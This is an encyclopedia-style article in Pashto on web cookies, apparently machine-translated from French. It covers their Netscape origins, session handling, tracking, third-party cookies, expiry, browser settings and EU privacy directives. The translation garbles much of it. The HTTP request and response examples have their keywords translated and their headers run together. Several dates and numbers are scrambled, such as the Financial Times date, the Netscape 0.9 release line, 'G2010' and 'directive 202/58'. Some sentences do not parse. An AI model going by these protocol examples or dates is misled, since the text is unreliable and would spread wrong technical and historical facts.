د انټرنیټ کوکیز: دا څه دي؟ تعریف، اصل، ډولونه او محرمیت

Un کوکیز یا ویب کوکیز (يا کوکی، په توګه لنډ شاهد په کیوبیک کې) د HTTP مخابراتو پروتوکول لخوا تعریف شوی د معلوماتو ترتیب دی چې د HTTP سرور لخوا HTTP پیرودونکي ته لیږل کیږي ، کوم چې وروستی بیرته راستنیږي هرکله چې ورته HTTP سرور د ځانګړو شرایطو لاندې پوښتل کیږي.

کوکی د الف سره برابر دی کوچنۍ متن فایل په ټرمینل کې زیرمه شوی د انټرنیټ کارونکي. د 20 کلونو څخه زیات شتون لري، دوی د ویب پاڼې پراختیا کونکو ته اجازه ورکوي چې د کاروونکي ډیټا ذخیره کړي ترڅو د دوی نیویګیشن اسانه کړي او ځینې فعالیتونه اجازه ورکړي. کوکیز تل لږ یا لږ جنجالي وي ځکه چې دوی پاتې شخصي معلومات لري چې احتمالا د دریمې ډلې لخوا کارول کیدی شي.

دا د ویب سرور لخوا ویب براوزر ته د HTTP سرلیک په توګه لیږل کیږي کوم چې هرکله چې سرور ته لاسرسی ومومي دا بیرته بدلیږي. یو کوکیز کارول کیدی شي یو تصدیق, یوه غونډه (د دولت ساتنه)، او د دې لپاره د کارونکي په اړه ځانګړي معلومات ذخیره کړئ، لکه د سایټ غوره توبونه یا د بریښنایی پیرود کارټ مینځپانګه. د کوکي اصطلاح له دې څخه اخیستل شوې ده جادو کوکی، په UNIX کمپیوټینګ کې یو پیژندل شوی مفهوم ، کوم چې د براوزر کوکیز نظر او نوم هڅولی. د کوکیز لپاره یو څو بدیلونه شتون لري، هر یو د دوی د کارولو، ګټو او زیانونو سره.

د ساده متن فایلونو په توګه، کوکیز د اجرا وړ ندي. هغوی نه دي نه سپایویر او نه ویروسونهکه څه هم د ځینو سایټونو کوکیز د ډیری انټي ویروس سافټویر لخوا کشف شوي ځکه چې دوی کاروونکو ته اجازه ورکوي چې تعقیب شي کله چې دوی ډیری سایټونو ته ځي. 

ډیری عصري براوزرونه کاروونکو ته اجازه ورکوي پریکړه وکړئ چې کوکیز ومني یا رد کړئ. کاروونکي هم کولی شي غوره کړئ چې کوکیز څومره وخت ساتل کیږي. په هرصورت، د کوکیز بشپړ رد کول ځینې سایټونه بې ګټې کوي. د مثال په توګه، د پیرودلو کارټونه یا سایټونه ذخیره کړئ چې د اعتبار (کارن نوم او پټنوم) په کارولو سره ننوتل ته اړتیا لري.

Historique

اصطلاح ککوړی د انګلیسي اصطلاح څخه اخیستل شوی جادو کوکی، کوم چې د ډیټا یوه کڅوړه ده چې یو برنامه ترلاسه کوي او بې بدله بیرته راستنیږي. کوکیز لا دمخه په IT کې کارول شوي کله چې لو مونټولي د دوی په ویب مخابراتو کې د کارولو مفکوره درلوده په جون کې 1994. په هغه وخت کې، هغه د Netscape مخابراتو لخوا ګمارل شوی و، کوم چې د پیرودونکي لپاره د ای کامرس غوښتنلیک جوړ کړی و. کوکیز د پلورنځي د مجازی شاپینګ کارټ پلي کولو د اعتبار ستونزې ته حل لاره ورکړه.

جان ګیانندریا او لو مونټولي په هماغه کال کې د نیټسکیپ لومړی کوکي توضیحات لیکلي. د موزیک نیټسکیپ 0.9 بیټا نسخه، د اکتوبر په 13، 1994 کې خپور شوی، یوځای شوی د کوکي ټیکنالوژي (پوسټ وګورئ). د کوکیز لومړی (غیر تجربی) کارول دا و چې دا معلومه کړي چې آیا د Netscape ویب پاڼې لیدونکو مخکې له دې سایټ څخه لیدنه کړې وه. مونټولي په 1995 کې د کوکي ټیکنالوژۍ لپاره د پیټینټ غوښتنلیک ثبت کړ، او د متحده ایاالتو پیټینټ 5774670 ورکړل شو. په 1998 کې ورکړل شوی.

په 0.9 کې د Netscape 1994 beta کې پلي کیدو وروسته، کوکیز په انټرنیټ اکسپلور 2 کې مدغم شول، چې د اکتوبر په 1995 کې خپور شو.

د کوکیز پیژندنه لاهم په پراخه کچه خلکو ته نه ده پیژندل شوې. په ځانګړې توګه، کوکیز د براوزر په ترتیباتو کې د ډیفالټ لخوا منل شوي، او کاروونکي د دوی د شتون څخه خبر شوي ندي. ځینې ​​خلک د 1995 کال د لومړۍ ربعې په شاوخوا کې د کوکیز د شتون څخه خبر وو، مګر عامو خلکو یوازې وروسته له هغه خپل شتون ته مخه کړه کله چې فایننشل ټایمز د 12 کال د فبروري په 1996 نیټه یوه مقاله خپره کړه. د محرمیت د احتمالي لاسوهنو له امله. د کوکیز موضوع په 1996 او 1997 کې د امریکا د فدرالي سوداګرۍ کمیسیون په دوه مشورو کې بحث شوې.

د رسمي کوکي مشخصاتو پراختیا لا دمخه روانه وه. د رسمي توضیحاتو لومړنۍ خبرې اترې د اپریل په 1995 کې د www-talk میلینګ لیست کې ترسره شوې. د IETF ځانګړې کاري ډله جوړه شوه. د HTTP معاملو ته د دولت معرفي کولو لپاره دوه بدیل وړاندیزونه په ترتیب سره د براین بهلینډورف او ډیویډ کریسټول لخوا وړاندیز شوي وو، مګر ګروپ، پخپله کریسټول مشري وکړه، پریکړه وکړه چې د نیټسکیپ مشخصات د پیل ټکي په توګه وکاروي. د 1996 په فبروري کې، کاري ډلې پریکړه وکړه چې د دریمې ډلې کوکیز د محرمیت لپاره یو مهم ګواښ دی. د ګروپ لخوا تولید شوي توضیحات په پای کې خپاره شوي RFC 2109.

د 2014 پای څخه، موږ په ډیری سایټونو کې د کوکیز په اړه یو بینر ګورو. لږترلږه یو د براوزر توسیع شتون لري چې اجازه ورکوي بینر ندی ښودل شوی.

د کوکیز ډولونه او کارونې

د غونډې مدیریت

کوکیز د نیویګیشن پرمهال د کارونکي ډیټا ساتلو لپاره کارول کیدی شي ، مګر په ډیری لیدنو کې هم. کوکیز د بریښنایی پیرود کارټونو پلي کولو وسیلې چمتو کولو لپاره معرفي شوي ، یو مجازی وسیله چې په کې کارونکي کولی شي هغه توکي راټول کړي چې هغه یې د سایټ د لټون کولو پرمهال اخیستل غواړي.

په دې ورځو کې، ایپسونه لکه د شاپینګ کارټونو پرځای په سرور کې په ډیټابیس کې د توکو لیست ذخیره کوي، کوم چې غوره دی؛ د دوی په کوکیز کې د خوندي کولو په پرتله. ویب سرور یو کوکی لیږي چې د ځانګړي ناستې ID لري. ویب براوزر بیا د هرې بلې غوښتنې په اړه د دې ناستې ID بیرته راګرځوي او په ټوکرۍ کې توکي خوندي شوي او د ورته ځانګړي ناستې ID سره تړاو لري.

د کوکیز بار بار کارول د اعتبار په کارولو سره سایټ ته د ننوتلو لپاره ګټور دي. په لنډه توګه، ویب سرور لومړی یو کوکی لیږي چې د ځانګړي ناستې ID لري. بیا کاروونکي خپل اسناد چمتو کوي (معمولا یو کارن نوم او پټنوم). بیا ویب غوښتنلیک سیشن تصدیق کوي او کارونکي ته اجازه ورکوي چې خدمت ته لاسرسی ومومي.

شخصي

کوکیز د سایټ د کارونکي په اړه د معلوماتو یادولو لپاره کارول کیدی شي، ترڅو په راتلونکي کې ورته مناسب مینځپانګه وښيي. د مثال په توګه، یو ویب سرور کولی شي یو کوکی واستوي چې وروستی کارن-نوم لري چې دې ویب پاڼې ته د ننوتلو لپاره کارول کیږي، نو دا کارن نوم په راتلونکو لیدنو کې مخکې له مخکې ډک کیدی شي.

ډیری ویب پاڼې د کاروونکي غوره توبونو پر بنسټ د شخصي کولو لپاره کوکیز کاروي. کاروونکي خپل غوره توبونه په یوه فورمه کې غوره کوي او سرور ته یې وسپاري. سرور په کوکي کې غوره توبونه کوډ کوي او بیرته براوزر ته لیږي. بیا وروسته، هرکله چې کاروونکي د دې سایټ پاڼې ته لاسرسی ومومي، براوزر کوکی بیرته راولي او له همدې امله د غوره توبونو لیست؛ بیا سرور کولی شي پاڼه د کارونکي غوره توبونو سره سم تنظیم کړي. د مثال په توګه، د ویکیپیډیا ویب پاڼه خپلو کاروونکو ته اجازه ورکوي چې د هغه سایټ پوست غوره کړي چې دوی یې غوره کوي. د ګوګل لټون انجن خپلو کاروونکو ته اجازه ورکوي (حتی که دوی راجستر شوي نه وي) د پایلو شمیره غوره کړي چې دوی غواړي د هرې پایلې پاڼې کې وګوري.

تعقیب

د تعقیب کوکیز د انټرنیټ کاروونکو د لټون کولو عادتونو تعقیب لپاره کارول کیږي. دا په یوه برخه کې د کمپیوټر د IP پتې په کارولو سره د یوې پاڼې لپاره غوښتنه کولو یا د 'ریفرر' HTTP سرلیک په کارولو سره ترسره کیدی شي چې پیرودونکي د هرې غوښتنې سره لیږي ، مګر کوکیز د ډیر دقیقیت لپاره اجازه ورکوي. دا په لاندې مثال کې ترسره کیدی شي:

1. که چیرې کاروونکي په سایټ کې یوه پاڼه ته زنګ ووهي، او غوښتنه کې کوکی نه وي، سرور ګومان کوي ​​چې دا د کارونکي لخوا لیدل شوی لومړی پاڼه ده. سرور بیا یو تصادفي تار رامینځته کوي او د غوښتل شوي پا pageې سره براوزر ته لیږي.
2. له دې شیبې څخه، کوکی به په اوتومات ډول د براوزر لخوا لیږل کیږي هرکله چې د سایټ نوې پاڼه ویل کیږي. سرور به د معمول په څیر پاڼه واستوي، مګر د پاڼې یو آر ایل به د ننوتلو په فایل کې، نیټه، د غوښتنې وخت او کوکیز ته هم ننوځي.

د لاګ فایل په کتلو سره، بیا دا ممکنه ده چې وګورئ چې کوم پاڼې کارونکي لیدلي او په کوم ترتیب کې. د مثال په توګه، که په فایل کې د id=abc کوکي په کارولو سره یو څو غوښتنې شاملې وي، دا ممکن دا ثابت کړي چې دا ټولې غوښتنې د ورته کارونکي څخه راځي. غوښتنه شوې URL، د غوښتنو سره تړلې نیټه او وخت د کاروونکي لټون کولو ته اجازه ورکوي چې تعقیب شي.

د دریمې ډلې کوکیز او ویب بیکون، چې لاندې تشریح شوي، سربیره پردې په مختلفو سایټونو کې تعقیب فعالوي. د واحد سایټ تعقیب عموما د احصایوي موخو لپاره کارول کیږي. په مقابل کې، د دریمې ډلې کوکیز په کارولو سره د مختلفو سایټونو تعقیب عموما د اعلاناتو شرکتونو لخوا د نامعلوم کارونکي پروفایلونو تولید لپاره کارول کیږي (کوم چې بیا د دې لپاره کارول کیږي چې کوم اعلانونه باید کارونکي ته وښودل شي او همدارنګه هغه ته د دې اعلاناتو سره سم بریښنالیکونه واستول شي - SPAM ).

د کوکیز تعقیب کول د کارونکي محرمیت د برید خطر دی مګر دوی په اسانۍ سره حذف کیدی شي. ډیری عصري براوزرونه د غوښتنلیک بندولو پر مهال په اتوماتيک ډول دوامداره کوکیز حذف کولو اختیار لري.

د دریمې ډلې کوکیز

انځورونه او نور شیان چې په ویب پاڼه کې شتون لري ممکن په سرورونو کې د پاڼې کوربه کولو څخه توپیر ولري. د پاڼې د ښودلو لپاره، براوزر دا ټول شیان ډاونلوډ کوي. ډیری ویب پاڼې د مختلفو سرچینو څخه معلومات لري. د مثال په توګه، که تاسو په خپل براوزر کې www.example.com ټایپ کړئ، ډیری وختونه به د پاڼې په برخه کې شیان یا اعلانونه وي چې د مختلفو سرچینو څخه راځي، د بیلګې په توګه د www.example.com په پرتله د مختلف ډومین څخه. "لومړی" ګوند کوکیز هغه کوکیز دي چې د براوزر په پته بار کې لیست شوي د ډومین لخوا تنظیم شوي. د دریمې ډلې کوکیز د یوې پاڼې شیانو لخوا تنظیم شوي چې د مختلف ډومین څخه راځي.

په ډیفالټ ډول، براوزرونه لکه موزیلا فایرفاکس، مایکروسافټ انټرنیټ اکسپلورر او اوپیرا د دریمې ډلې کوکیز مني، مګر کاروونکي کولی شي د دوی د بندولو لپاره د براوزر په اختیارونو کې ترتیبات بدل کړي. د دریمې ډلې کوکیز کې هیڅ امنیتي خطر شتون نلري چې د ویب فعالیت فعالوي، مګر دا د کاروونکو د تعقیب لپاره هم کارول کیږي. له سایټ څخه سایټ ته.

وسیلې لکه Ghostery د ټولو براوزرونو لپاره شتون لري په شمول د ګوګل کروم کولی شي د دریمې ډلې ترمینځ تبادله بنده کړي.

تطبیق

کوکیز د ډیټا کوچنۍ ټوټې دي چې د ویب سرور لخوا براوزر ته لیږل کیږي. براوزر دوی سرور ته بې بدله بیرته راګرځوي، حالت (د تیرو پیښو یادونه) په بل ډول بې ریاست HTTP لیږد ته معرفي کوي. د کوکیز پرته، د ویب پاڼې هر یو ترلاسه کول یا د ویب پاڼې برخې یوه جلا پیښه ده، د ورته سایټ څخه د نورو غوښتنو څخه خپلواکه ده. د ویب سرور لخوا د تنظیم کولو وړ کیدو سربیره ، کوکیز د سکریپټ ژبې لکه جاوا سکریپټ لخوا هم تنظیم کیدی شي ، که چیرې د براوزر لخوا ملاتړ او اختیار شوی وي.

د کوکي رسمي مشخصات وړاندیز کوي چې براوزر باید د دې وړ وي چې لږترلږه کوکیز خوندي او بیا واستوي. په ځانګړې توګه، یو براوزر باید د دې وړتیا ولري چې لږترلږه 300 کوکیز د څلور کیلوبایټ هر یو، او لږترلږه 20 کوکیز د یو سرور یا ډومین لپاره ذخیره کړي.

د 3.1 برخې له مخې RFC 2965، د کوکي نومونه د قضیې سره حساس ندي.

یو کوکی کولی شي د هغې د ختمیدو نیټه مشخص کړي، په کوم حالت کې کوکی به پدې نیټه حذف شي. که چیرې کوکي د ختمیدو نیټه مشخص نکړي، نو کوکی ژر تر ژره حذف کیږي کله چې کاروونکي خپل براوزر پریږدي. له همدې امله، د پای نیټې مشخص کول د څو غونډو له لارې د کوکي د ژوندي پاتې کیدو یوه لاره ده. د دې دلیل لپاره، د پای نیټې سره کوکیز ویل کیږي دوامداره. د غوښتنلیک مثال: یو پرچون سایټ ممکن د دوامداره کوکیز څخه کار واخلي ترڅو هغه توکي ثبت کړي چې کاروونکو په خپل پیرود کارټ کې ځای په ځای کړي دي (په حقیقت کې، کوکی ممکن د پلور په سایټ کې په ډیټابیس کې خوندي شوي ننوتلو ته مراجعه وکړي، نه ستاسو په کمپیوټر کې) . د دې وسیلې له لارې ، که چیرې کاروونکي خپل براوزر پرته له پیرود څخه پریږدي او وروسته بیرته دې ته راشي ، نو دوی به وکولی شي په کارټ کې توکي بیا ومومي. که دا کوکیز د ختمیدو نیټه نه وي ورکړي، نو دوی به د براوزر د تړل کیدو په وخت کې پای ته ورسیږي، او د باسکیټ مینځپانګې په اړه معلومات به ورک شي.

کوکیز کولی شي په یو ځانګړي ډومین، فرعي ډومین یا سرور کې لاره پورې محدود وي چې دوی یې رامینځته کړي.

د کوکي جوړول

د ویب پاڼو لیږد د HyperText لیږد پروتوکول (HTTP) په کارولو سره ترسره کیږي. د کوکیز په پام کې نیولو سره، براوزر د ویب سرورونو څخه یوه پاڼه په عمومي ډول د لنډ متن په لیږلو سره غږوي د HTTP غوښتنه. د مثال په توګه، www.example.org/index.html پاڼې ته د لاسرسي لپاره، براوزر د سرور www.example.org سره نښلوي او یوه غوښتنه لیږي چې داسې ښکاري:

	ترلاسه کړئ /index.html HTTP/1.1 کوربه: www.example.org
Navigator	→	serveur

سرور د غوښتل شوي پاڼې په لیږلو سره ځواب ورکوي، د ورته متن څخه مخکې، ټول ویل کیږي د HTTP ځواب. دا کڅوړه ممکن هغه لیکې ولري چې براوزر ته د کوکیز ذخیره کولو لارښوونه کوي:

	HTTP/1.1 200 OK د منځپانګې ډول: متن/htmlSet-Cookie: name=value (HTML پاڼه)
Navigator	←	serveur

سرور یوازې د Set-Cookie لاین لیږي، که چیرې سرور وغواړي براوزر کوکی ذخیره کړي. Set-Cookie د براوزر لپاره غوښتنه ده چې د name=value string ذخیره کړي او سرور ته یې په راتلونکو ټولو غوښتنو کې بیرته راولي. که براوزر د کوکیز ملاتړ کوي او کوکیز د براوزر په اختیارونو کې فعال شوي وي، کوکي به په ورته سرور کې په ټولو راتلونکو غوښتنو کې شامل شي. د مثال په توګه، براوزر www.example.org/news.html پاڼې ته زنګ وهي او سرور ته د لاندې غوښتنې په لیږلو سره www.example.org:

	ترلاسه کړئ /news.html HTTP/1.1 کوربه: www.example.org کوکي: name=valueAccept: */*
Navigator	→	serveur

دا د ورته سرور څخه د بلې پاڼې غوښتنه ده، او د پورته پورته لومړي څخه توپیر لري ځکه چې دا یو تار لري چې سرور مخکې براوزر ته لیږلی و. د دې وسیلې څخه مننه ، سرور پوهیږي چې دا غوښتنه د تیر سره تړاو لري. سرور د ویل شوي پاڼې په لیږلو سره ځواب ورکوي، او همدارنګه د نورو کوکیز په اضافه کولو سره.

د کوکي ارزښت د سرور لخوا د نوي لاین په لیږلو سره بدل کیدی شي Set-Cookie: name=new_value د ویل شوي پاڼې په ځواب کې. براوزر بیا زاړه ارزښت له نوي سره بدلوي.

د Set-Cookie کرښه معمولا د CGI برنامه یا د سکریپټینګ بلې ژبې لخوا رامینځته کیږي ، نه د HTTP سرور لخوا. د HTTP سرور (مثال: اپاچی) به یوازې براوزر ته د برنامه پایله (د سرلیک څخه مخکې یو سند چې کوکیز لري) لیږدوي.

کوکیز د جاواسکریپټ یا نورو ورته ژبو لخوا هم تنظیم کیدی شي چې په براوزر کې چلیږي ، د بیلګې په توګه د سرور اړخ پرځای د پیرودونکي اړخ کې. په جاواسکریپټ کې، document.cookie څیز د دې هدف لپاره کارول کیږي. د مثال په توګه، بیان document.cookie = "temperature=20" د "حرارت" په نوم یو کوکی جوړوي او د 20 ارزښت لري.

د کوکیز ځانګړتیاوې

د نوم / ارزښت جوړه سربیره، کوکی کولی شي د ختمیدو نیټه، لاره، د ډومین نوم او د پیوستون ډول ولري، د بیلګې په توګه نورمال یا کوډ شوی. RFC 2965 دا ​​هم تعریفوي چې کوکیز باید د لازمي نسخه شمیره ولري، مګر دا په عمومي توګه پریښودل کیږي. د معلوماتو دا برخې د نوم = new_value جوړه پیروي کوي او د سیمیکولون لخوا جلا شوي. د مثال په توګه، کوکی د سرور لخوا د Set-Cookie لاین په لیږلو سره رامینځته کیدی شي: name=new_value; ختمیږي = نیټه لاره=/؛ domain=.example.org.

د کوکي ختمول

کوکیز پای ته رسیږي او بیا د براوزر لخوا په لاندې حالتونو کې سرور ته نه لیږل کیږي:

• کله چې براوزر وتړل شي، که کوکي دوامداره نه وي.
• کله چې د کوکیز د ختمیدو نیټه تیره شوه.
• کله چې د کوکي د ختمیدو نیټه بدله شي (د سرور یا سکریپټ لخوا) په تیر تاریخ کې.
• کله چې براوزر د کارونکي په غوښتنه کوکي حذف کوي.

دریم حالت سرورونو یا سکریپټونو ته اجازه ورکوي چې په ښکاره ډول کوکی حذف کړي. په یاد ولرئ چې دا د ګوګل کروم ویب براوزر سره ممکنه ده چې د مینځپانګې ترتیباتو ته د لاسرسي له لارې د ځانګړي کوکي د پای نیټه وپیژني. په کمپیوټر کې خوندي شوی کوکی ممکن د څو لسیزو لپاره په ښه توګه پاتې شي که چیرې د پاکولو لپاره کومه کړنلاره ونه نیول شي.

سټیریوټایپونه

په انټرنیټ کې د دوی د معرفي کولو راهیسې، د کوکیز په اړه ډیری نظرونه په انټرنیټ او رسنیو کې خپاره شوي. په 1998 کې، CIAC، د متحده ایالاتو د انرژۍ د څانګې د کمپیوټر پیښو د څارنې ټیم، دا معلومه کړه چې د کوکی امنیت زیانمنتیاوې "په بنسټیز ډول شتون نلري" او تشریح یې کړه چې "ستاسو د لیدنو اصل او د هغو ویب پاڼو توضیحات چې تاسو لیدلي دي. لا دمخه د ویب سرورونو لاګ فایلونو کې شتون لري". په 2005 کې، Jupiter Research د یوې څیړنې پایلې خپرې کړې، په کوم کې چې د پام وړ سلنه ځواب ویونکو لاندې بیانونه په پام کې نیولي دي:

• کوکیز داسې دي ویروس، دوی د کاروونکو هارډ ډرایو اخته کوي.
• کوکیز تولیدوي ښکاره کېدل.
• کوکیز د لیږلو لپاره کارول کیږي سپم.
• کوکیز یوازې د اعلاناتو لپاره کارول کیږي.

کوکیز نشي کولی د کارونکي کمپیوټر څخه معلومات حذف یا لوستل شي. په هرصورت، کوکیز دا ممکنه کوي چې هغه ویب پاڼې کشف کړي چې د یو کارونکي لخوا په یو ورکړل شوي سایټ یا سایټونو کې لیدل کیږي. دا معلومات د کارونکي پروفایل کې راټول کیدی شي چې دریم اړخ ته کارول یا پلورل کیدی شي ، کوم چې کولی شي د محرمیت جدي مسلې رامینځته کړي. ځینې ​​پروفایلونه بې نومه دي، په دې معنی چې دوی هیڅ شخصي معلومات نلري، حتی دا ډول پروفایلونه د پوښتنې وړ کیدی شي.

د ورته څیړنې له مخې، د انټرنیټ کاروونکو لویه سلنه نه پوهیږي چې څنګه کوکیز حذف کړي. یو له هغو دلیلونو څخه چې خلک په کوکیز باور نه کوي دا دی چې ځینې سایټونو د کوکیز شخصي پیژندلو اړخ څخه ناوړه ګټه اخیستې او دا معلومات یې د نورو سرچینو سره شریک کړي. د نښه شوي اعلاناتو او ناغوښتل شوي بریښنالیک لویه سلنه، چې سپیم ګڼل کیږي، د کوکیز تعقیب څخه راټول شوي معلوماتو څخه راځي.

د براوزر ترتیبات

ډیری براوزر د کوکیز ملاتړ کوي او کارونکي ته اجازه ورکوي چې دوی غیر فعال کړي. تر ټولو عام انتخابونه دي:

• کوکیز په بشپړ ډول فعال یا غیر فعال کړئ، ترڅو دوی په دوامداره توګه منل شوي یا بلاک شوي وي.
• کارونکي ته اجازه ورکړئ چې په یوه ورکړل شوې پاڼه کې فعال کوکیز وګوري، د جاوا سکرپٹ په داخلولو سره: alert(document.cookie) د براوزر په پته بار کې. ځینې ​​براوزرونه د کارونکي لپاره د کوکي مدیر شاملوي چې کولی شي د براوزر لخوا زیرمه شوي کوکیز وګوري او په انتخابي ډول حذف کړي.

ډیری براوزرونه د شخصي معلوماتو بشپړ حذف کولو ته هم اجازه ورکوي چې کوکیز پکې شامل دي. د کوکي اجازې کنټرول لپاره اضافي ماډلونه هم شتون لري.

محرمیت او د دریمې ډلې کوکیز

په دې جعلي مثال کې، د اعلاناتو شرکت په دوو ویب پاڼو کې بینرونه ایښودل. په خپلو سرورونو کې د بینرونو کوربه کولو او د دریمې ډلې کوکیز په کارولو سره، د اعلاناتو شرکت کولی شي د دې دوو سایټونو له لارې د کاروونکي نیویګیشن تعقیب کړي.

کوکیز د ویب کاروونکو د محرمیت او هویت لپاره مهمې اغیزې لري. که څه هم کوکیز یوازې هغه سرور ته لیږل کیږي چې دوی یې تنظیم کړي یا د ورته انټرنیټ ډومین پورې اړوند سرور ته لیږل کیږي، که څه هم یوه ویب پاڼه کیدای شي انځورونه یا نور برخې ولري چې په نورو ډومینونو پورې اړوند سرورونو کې زیرمه شوي وي. هغه کوکیز چې د دې خارجي اجزاوو د بیا رغونې په وخت کې تنظیم شوي ویل کیږي د دریمې ډلې کوکیز. پدې کې د ناغوښتل شوي پاپ اپ وینډوز څخه کوکیز شامل دي.

د اعلاناتو شرکتونه د دریمې ډلې کوکیز کاروي ترڅو کاروونکي په مختلفو سایټونو کې تعقیب کړي چې دوی یې ګوري. په ځانګړې توګه، د اعلاناتو شرکت کولی شي یو کاروونکي په ټولو پاڼو کې تعقیب کړي چیرې چې د اعلاناتو انځورونه یا د تعقیب پکسل ځای پرځای کړي. د کارونکي لخوا لیدل شوي مخونو پوهه د اعلاناتو شرکت ته اجازه ورکوي چې د کارونکي د اعلاناتو غوره توبونه په نښه کړي.

د یو کارن پروفایل جوړولو وړتیا د ځینو لخوا د محرمیت برید ګڼل کیږي، په ځانګړې توګه کله چې تعقیب د دریمې ډلې کوکیز په کارولو سره په مختلفو ډومینونو کې ترسره کیږي. د دې دلیل لپاره، ځینې هیوادونه د کوکیز قانون لري.

د متحده ایالاتو حکومت په 2000 کې د کوکیز ځای په ځای کولو باندې سخت مقررات پلي کړل، وروسته له دې چې څرګنده شوه چې د سپینې ماڼۍ د مخدره توکو د پالیسۍ دفتر د کوکیز څخه کار اخلي ترڅو د کاروونکو کمپیوټرونه تعقیب کړي چې آنلاین د مخدره توکو اعلانونه ګوري. په 2002 کې، د محرمیت فعال ډینیل برانډټ وموندله چې CIA په کمپیوټرونو کې دوامداره کوکیز پریښودل چې ویب پاڼې یې لیدلي وې. کله چې د دې سرغړونې په اړه خبر شو، سي آی اې اعلان وکړ چې دا کوکیز په قصدي توګه نه و لیږل شوي او د دوی ترتیب یې بند کړ. د دسمبر په 25، 2005، برانډټ وموندله چې د ملي امنیت ادارې (NSA) د سافټویر تازه کولو له امله د لیدونکو په کمپیوټرونو کې دوه دوامداره کوکیز پریښودل. د خبرتیا وروسته، NSA سمدستي کوکیز غیر فعال کړل.

په انګلستان کې، د د کوکي قانون "، د می په 25، 2012 نافذ شوی، سایټونه مکلف دي چې خپل اراده اعلان کړي، په دې توګه کاروونکو ته اجازه ورکوي چې انتخاب کړي که دوی غواړي په انټرنیټ کې د دوی د تیریدو نښې پریږدي یا نه. په دې توګه دوی کولی شي د اعلاناتو په نښه کولو څخه خوندي شي. په هرصورت، په وینا د د ګارډیند انټرنیټ کاروونکو رضایت لازمي نه دی چې واضح وي؛ د کارونکي رضایت شرایطو کې بدلونونه رامینځته شوي ، دا رامینځته کوي په دې توګه معنی لري.

د محرمیت په اړه 2002/58 لارښود

لارښود 202/58 محرمیت او بریښنایی مخابراتو ، د کوکیز کارولو مقررات لري. په ځانګړي توګه ، د دې لارښود 5 ماده ، 3 پراګراف اړتیا لري چې د کارونکي کمپیوټر کې د معلوماتو ذخیره (لکه کوکیز) یوازې ترسره کیدی شي که:

• کارونکي ته خبر ورکول کیږي چې معلومات څنګه کارول کیږي؛
• کارونکي ته د دې ذخیره کولو عملیاتو څخه انکار کولو اختیار ورکول کیږي. په هرصورت، دا ماده دا هم وایي چې د تخنیکي دلایلو لپاره د معلوماتو ذخیره کول د دې قانون څخه مستثنی دي.

د 2003 کال د اکتوبر څخه د پلي کیدو له امله، دا لارښود یوازې د 2004 کال د دسمبر د یو راپور له مخې په خورا نیمګړتیا سره عملي شوی و، کوم چې دا هم په ګوته کوي چې ځینې غړي هیوادونه (سلواکیا، لاتویا، یونان، بلجیم او لوګزامبورګ) لا تر اوسه ندي لیږدولي. په کورني قانون کې لارښود.

په 29 کې د G2010 د نظر سره سم، دا لارښود، کوم چې په ځانګړې توګه د چلند اعلاناتو موخو لپاره د کوکیز کارولو شرایط، د انټرنیټ کاروونکي په ښکاره رضايت کې خورا ضعیف پلي کیږي. په حقیقت کې، ډیری سایټونه دا په داسې طریقه ترسره کوي چې د لارښوونې سره سم نه وي، د "تخنیکي" کوکیز ترمنځ توپیر پرته، د کارولو په اړه د معلوماتو ورکولو پرته، د "کوکیز" کارولو په اړه د ساده "بینر" خبرتیا محدودولو سره. کوکیز "ټریک کول"، او نه هم هغه کارونکي ته د ریښتیني انتخاب وړاندیز کول چې غواړي تخنیکي کوکیز وساتي (لکه د پیرود کارټ مدیریت کوکیز) او د "ټریک کولو" کوکیز رد کړي. په حقیقت کې، ډیری سایټونه په سمه توګه کار نه کوي که چیرې کوکیز رد شي، کوم چې د لارښود 2002/58 یا لارښود 95/46 (د شخصي معلوماتو ساتنه) سره مطابقت نلري.

لارښود 2009/136/CE

دا مواد د 2009/136/EC لارښود لخوا د نومبر 25، 2009 نیټې لخوا تازه شوي چې پکې ویل شوي چې "د معلوماتو ذخیره کول، یا مخکې له مخکې ذخیره شوي معلوماتو ته د لاسرسي ترلاسه کول، د پیرودونکي یا کارونکي په ټرمینل تجهیزاتو کې یوازې په دې شرط اجازه لري چې پیرودونکي یا کارونکي د ترلاسه کولو وروسته، د 95/46/EC لارښوونو سره سم، د پروسس کولو موخو په اړه د نورو تر منځ روښانه او بشپړ معلومات، د ترلاسه کولو وروسته خپل رضايت ورکړي. له همدې امله نوی لارښود د انټرنیټ کارونکي کمپیوټر کې د کوکیز ایښودلو دمخه مکلفیتونه پیاوړي کوي.

د لارښوونو په لومړنیو نظرونو کې، اروپایی قانون جوړونکی په هرصورت مشخص کوي: "چیرته چې تخنیکي پلوه ممکنه او مؤثره وي، د لارښوونې 95/46/EC اړوندو احکامو سره سم، د پروسس کولو په اړه د کارونکي رضايت د دې له لارې څرګند کیدی شي. د براوزر یا بل غوښتنلیک مناسب ترتیباتو کارول". مګر په حقیقت کې، تر اوسه هیڅ براوزر دا ممکنه نه کوي چې اړین تخنیکي کوکیز له اختیاري څخه جلا کړي کوم چې باید د کاروونکي انتخاب ته پریښودل شي.

دا نوی لارښود د 2012 کال د جولای په میاشت کې د بلجیم د پارلمان غړو لخوا لیږدول شوی و. د 2014 یوه څیړنه ښیي چې حتی د پارلمان غړي د پلي کولو لپاره مبارزه کوي. د لارښوونې محدودیتونه.

P3P

د P3P توضیحاتو کې د سرور لپاره وړتیا شامله ده چې د محرمیت پالیسي بیان کړي ، کوم چې دا مشخص کوي چې کوم ډول معلومات راټولوي او د کوم هدف لپاره. پدې پالیسیو کې د کوکیز په کارولو سره راټول شوي معلوماتو کارول شامل دي (مګر محدود ندي). د P3P د تعریفونو له مخې، براوزر کولی شي د کارونکي غوره توبونو سره د محرمیت تګلارې پرتله کولو یا د کاروونکي په غوښتنه، د سرور لخوا اعلان شوي د محرمیت پالیسۍ محرمیت بیان وړاندې کولو سره کوکیز ومني یا رد کړي.

ډیری براوزرونه، په شمول د ایپل سفاري او مایکروسافټ انټرنیټ اکسپلورر نسخه 6 او 7، د P3P ملاتړ کوي کوم چې براوزر ته اجازه ورکوي چې معلومه کړي چې ایا د دریمې ډلې کوکیز ذخیره کول منل کیږي. د اوپیرا براوزر کاروونکو ته اجازه ورکوي چې د دریمې ډلې کوکیز رد کړي او د انټرنیټ ډومینونو لپاره نړیوال او ځانګړي امنیتي پروفایل رامینځته کړي. د موزیلا فایرفاکس نسخه 2 د P3P ملاتړ له لاسه ورکړ مګر په 3 نسخه کې یې بیا ځای په ځای کړ.

